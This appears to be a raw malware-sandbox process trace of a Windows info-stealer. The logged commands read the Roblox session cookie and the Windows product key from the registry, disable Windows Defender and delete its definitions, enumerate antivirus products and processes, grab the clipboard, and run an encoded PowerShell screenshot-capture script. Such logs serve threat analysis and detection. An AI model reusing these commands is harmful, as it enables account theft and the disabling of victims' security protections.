CAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=4⤵PID:7084
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ytbv3iij\ytbv3iij.cmdline"5⤵PID:3768
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5B08.tmp" "c:\Users\Admin\AppData\Local\Temp\ytbv3iij\CSC5C48EA3E109F448CAE327A6EDC6EAAA6.TMP"6⤵PID:6936
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:1180
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:6508
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:6148
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:5452
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:5560
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:3516
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:6268
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:5996
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:6260
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:5552
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:6008
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Command and Scripting Interpreter: PowerShell
PID:2972
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:3564
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:5924
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵PID:3368
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"3⤵PID:6660
-
C:\Windows\system32\getmac.exegetmac4⤵PID:5400
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"3⤵PID:4872
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption4⤵PID:1556
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"3⤵PID:2176
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory4⤵PID:5224
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:6140
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵PID:5352
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"3⤵PID:4196
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:5920
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Command and Scripting Interpreter: PowerShell
PID:5768
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵PID:2932
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:5888
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"3⤵PID:3828
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault4⤵PID:6748
-
-
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵PID:1868
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious use of SetWindowsHookEx
PID:6620 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1944 -parentBuildID 20240401114208 -prefsHandle 1856 -prefMapHandle 1844 -prefsLen 24588 -prefMapSize 245122 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a1c5343c-f920-4b86-92a8-86684e88bf3c} 6620 "\\.\pipe\gecko-crash-server-pipe.6620" gpu3⤵PID:3804
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2300 -parentBuildID 20240401114208 -prefsHandle 2284 -prefMapHandle 2280 -prefsLen 24588 -prefMapSize 245122 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e3b39c36-e744-4204-be32-3a240a618b13} 6620 "\\.\pipe\gecko-crash-server-pipe.6620" socket3⤵
- Checks processor information in registry
PID:1752
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3348 -childID 1 -isForBrowser -prefsHandle 2924 -prefMapHandle 3344 -prefsLen 25087 -prefMapSize 245122 -jsInitHandle 1192 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a97967a5-1d2f-414b-a719-8233e25b6fe4} 6620 "\\.\pipe\gecko-crash-server-pipe.6620" tab3⤵PID:7084
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3728 -childID 2 -isForBrowser -prefsHandle 2856 -prefMapHandle 3712 -prefsLen 30263 -prefMapSize 245122 -jsInitHandle 1192 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ba425564-bbda-4ce6-acc0-4b2f41e7f758} 6620 "\\.\pipe\gecko-crash-server-pipe.6620" tab3⤵PID:5872
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4756 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4812 -prefMapHandle 4808 -prefsLen 30263 -prefMapSize 245122 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {10229ff3-a244-4264-b3d7-70063197a537} 6620 "\\.\pipe\gecko-crash-server-pipe.6620" utility3⤵
- Checks processor information in registry
PID:2360
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5256 -childID 3 -isForBrowser -prefsHandle 5260 -prefMapHandle 3244 -prefsLen 27835 -prefMapSize 245122 -jsInitHandle 1192 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {123bda3c-d602-4733-acf5-fc88b338b6ce} 6620 "\\.\pipe\gecko-crash-server-pipe.6620" tab3⤵PID:4976
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5356 -childID 4 -isForBrowser -prefsHandle 5436 -prefMapHandle 5432 -prefsLen 27835 -prefMapSize 245122 -jsInitHandle 1192 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a95d74cd-1535-498b-b4e4-6fc41f233a4d} 6620 "\\.\pipe\gecko-crash-server-pipe.6620" tab3⤵PID:4892
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5564 -childID 5 -isForBrowser -prefsHandle 5640 -prefMapHandle 5636 -prefsLen 27835 -prefMapSize 245122 -jsInitHandle 1192 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {756a116a-7218-48b5-9cf0-d3e4063d79c4} 6620 "\\.\pipe\gecko-crash-server-pipe.6620" tab3⤵PID:4348
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5572 -childID 6 -isForBrowser -prefsHandle 5852 -prefMapHandle 5388 -prefsLen 27835 -prefMapSize 245122 -jsInitHandle 1192 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9ebe8ddd-1565-4952-b517-d46c8f91fabc} 6620 "\\.\pipe\gecko-crash-server-pipe.6620" tab3⤵PID:3300
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6540 -childID 7 -isForBrowser -prefsHandle 6508 -prefMapHandle 6536 -prefsLen 27835 -prefMapSize 245122 -jsInitHandle 1192 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {51fe5210-c888-4e37-8613-d095c92b3a0e} 6620 "\\.\pipe\gecko-crash-server-pipe.6620" tab3⤵PID:4648
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6824 -childID 8 -isForBrowser -prefsHandle 6576 -prefMapHandle 6820 -prefsLen 27835 -prefMapSize 245122 -jsInitHandle 1192 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2e38032a-7662-41b2-b723-4c8a8f96677c} 6620 "\\.\pipe\gecko-crash-server-pipe.6620" tab3⤵PID:6224
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6220 -childID 9 -isForBrowser -prefsHandle 4108 -prefMapHandle 4100 -prefsLen 27835 -prefMapSize 245122 -jsInitHandle 1192 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2ee6ae64-8573-4ab1-a97b-d53dab4ce8ed} 6620 "\\.\pipe\gecko-crash-server-pipe.6620" tab3⤵PID:2056
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7500 -childID 10 -isForBrowser -prefsHandle 7416 -prefMapHandle 7424 -prefsLen 27835 -prefMapSize 245122 -jsInitHandle 1192 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {aacbe929-ecd2-46ca-bfdc-3dd2956366e4} 6620 "\\.\pipe\gecko-crash-server-pipe.6620" tab3⤵PID:3848
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7696 -childID 11 -isForBrowser -prefsHandle 7612 -prefMapHandle 7620 -prefsLen 27835 -prefMapSize 245122 -jsInitHandle 1192 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {85c26d62-c570-4c72-8d98-cc591157d1ab} 6620 "\\.\pipe\gecko-crash-server-pipe.6620" tab3⤵PID:1264
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5564 -childID 12 -isForBrowser -prefsHandle 5904 -prefMapHandle 5368 -prefsLen 27835 -prefMapSize 245122 -jsInitHandle 1192 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f53b8ce1-815f-4bee-9035-743d324dc78e} 6620 "\\.\pipe\gecko-crash-server-pipe.6620" tab3⤵PID:3792
-
-
-
C:\Users\Admin\Desktop\die\die.exe"C:\Users\Admin\Desktop\die\die.exe"1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:6000
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵PID:6352
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:5336 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1928 -parentBuildID 20240401114208 -prefsHandle 1856 -prefMapHandle 1848 -prefsLen 24531 -prefMapSize 245122 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b5754139-9d3c-487d-a9bb-f90dbed2f2d6} 5336 "\\.\pipe\gecko-crash-server-pipe.5336" gpu3⤵PID:5892
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2284 -parentBuildID 20240401114208 -prefsHandle 2276 -prefMapHandle 2272 -prefsLen 24531 -prefMapSize 245122 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {211ef20b-be68-4934-bcdd-9759f294ddd1} 5336 "\\.\pipe\gecko-crash-server-pipe.5336" socket3⤵
- Checks processor information in registry
PID:4316
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3052 -childID 1 -isForBrowser -prefsHandle 2960 -prefMapHandle 3020 -prefsLen 25030 -prefMapSize 245122 -jsInitHandle 1348 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {838f5701-a7ba-46b7-8ed2-b55cd8aad6cb} 5336 "\\.\pipe\gecko-crash-server-pipe.5336" tab3⤵PID:4272
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2644 -childID 2 -isForBrowser -prefsHandle 3536 -prefMapHandle 3608 -prefsLen 30263 -prefMapSize 245122 -jsInitHandle 1348 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4ef6fd09-eed7-4cac-9c4c-54fd2bb3908f} 5336 "\\.\pipe\gecko-crash-server-pipe.5336" tab3⤵PID:6288
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4812 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4804 -prefMapHandle 4800 -prefsLen 30317 -prefMapSize 245122 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ef7930ce-8df7-42af-b83d-71e70eeb0089} 5336 "\\.\pipe\gecko-crash-server-pipe.5336" utility3⤵
- Checks processor information in registry
PID:2576
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5268 -childID 3 -isForBrowser -prefsHandle 5220 -prefMapHandle 5236 -prefsLen 27782 -prefMapSize 245122 -jsInitHandle 1348 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b8b43515-a23b-4026-9180-9d708e62207f} 5336 "\\.\pipe\gecko-crash-server-pipe.5336" tab3⤵PID:6960
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5404 -childID 4 -isForBrowser -prefsHandle 5412 -prefMapHandle 5416 -prefsLen 27782 -prefMapSize 245122 -jsInitHandle 1348 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f12d16b8-cf4b-4616-9ddd-8741867b14e1} 5336 "\\.\pipe\gecko-crash-server-pipe.5336" tab3⤵PID:4548
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5620 -childID 5 -isForBrowser -prefsHandle 5696 -prefMapHandle 5692 -prefsLen 27782 -prefMapSize 245122 -jsInitHandle 1348 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0fabd034-42b9-4dd2-9544-4b2839cb73cb} 5336 "\\.\pipe\gecko-crash-server-pipe.5336" tab3⤵PID:3824
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6012 -childID 6 -isForBrowser -prefsHandle 6072 -prefMapHandle 6068 -prefsLen 27782 -prefMapSize 245122 -jsInitHandle 1348 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {11e4e474-fc49-4e8a-91de-ae320a2a1a4d} 5336 "\\.\pipe\gecko-crash-server-pipe.5336" tab3⤵PID:1968
-
-
-
C:\Users\Admin\Desktop\onefile_6488_133779369635176755\0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe"C:\Users\Admin\Desktop\onefile_6488_133779369635176755\0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe"1⤵PID:6708
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"2⤵PID:5620
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend3⤵
- Command and Scripting Interpreter: PowerShell
PID:3476
-
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:4780
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"2⤵PID:4752
-
C:\Windows\system32\tasklist.exetasklist /FO LIST3⤵
- Enumerates processes with tasklist
PID:5392
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"2⤵PID:2756
-
C:\Windows\system32\tasklist.exetasklist /FO LIST3⤵
- Enumerates processes with tasklist
PID:2876
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"2⤵PID:6552
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName3⤵PID:5844
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:4440 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:4676
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"2⤵PID:4672
-
C:\Windows\system32\tree.comtree /A /F3⤵PID:5632
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"2⤵PID:3652
-
C:\Windows\system32\tasklist.exetasklist /FO LIST3⤵
- Enumerates processes with tasklist
PID:5884
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"2⤵PID:5564
-
C:\Windows\system32\systeminfo.exesysteminfo3⤵
- Gathers system information
PID:5168
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYA